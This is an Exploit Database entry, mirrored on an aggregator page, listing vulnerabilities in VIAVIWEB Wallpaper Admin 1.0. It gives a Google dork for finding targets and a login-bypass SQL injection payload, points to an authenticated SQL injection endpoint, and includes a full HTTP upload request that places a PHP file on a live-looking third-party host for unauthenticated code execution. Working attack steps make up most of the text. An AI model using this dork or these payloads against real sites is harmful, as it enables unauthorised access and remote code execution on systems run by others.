VIAVIWEB Wallpaper Admin 1.0 – Multiple Vulnerabilities

• Exploit Database
• 21 阅读

• 作者： Edd13Mora
  日期： 2023-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51033/

• # Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
  # Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
  # Date: [18/09/2022]
  # Exploit Author: [Edd13Mora]
  # Vendor Homepage: [www.viaviweb.com]
  # Version: [N/A]
  # Tested on: [Windows 11 - Kali Linux]
  
  ------------------
  SQLI on the Login page
  ------------------
  payload --> admin' or 1=1-- -
  ---
  POC:
  ---
  [1] Disable JavaScript on ur browser put the payload and submit
  [2] Reactive JavaScript and resend the request
  ---------------------------
  Authenticated SQL Injection:
  ---------------------------
  Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
  -----------------------------------------------
  Remote Code Execution (RCE none authenticated):
  -----------------------------------------------
  Poc:
  ----
  Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
  --------------------
  Burp Request :
  --------------------
  
  POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
  Host: http://googlezik.freehostia.com
  Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
  Content-Length: 467
  Origin: http://googlezik.freehostia.com
  Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  
  -----------------------------33893919268150571572221367848
  Content-Disposition: form-data; name="category_id"
  
  1
  -----------------------------33893919268150571572221367848
  Content-Disposition: form-data; name="image[]"; filename="poc.php"
  Content-Type: image/png
  
  <?php phpinfo(); ?>
  -----------------------------33893919268150571572221367848
  Content-Disposition: form-data; name="submit"
  
  
  -----------------------------33893919268150571572221367848--
  
  
  Uploaded File can be found here :
  --------------------------------
  http://localhost/PAth-Where-Script-Installed/categories/
  ```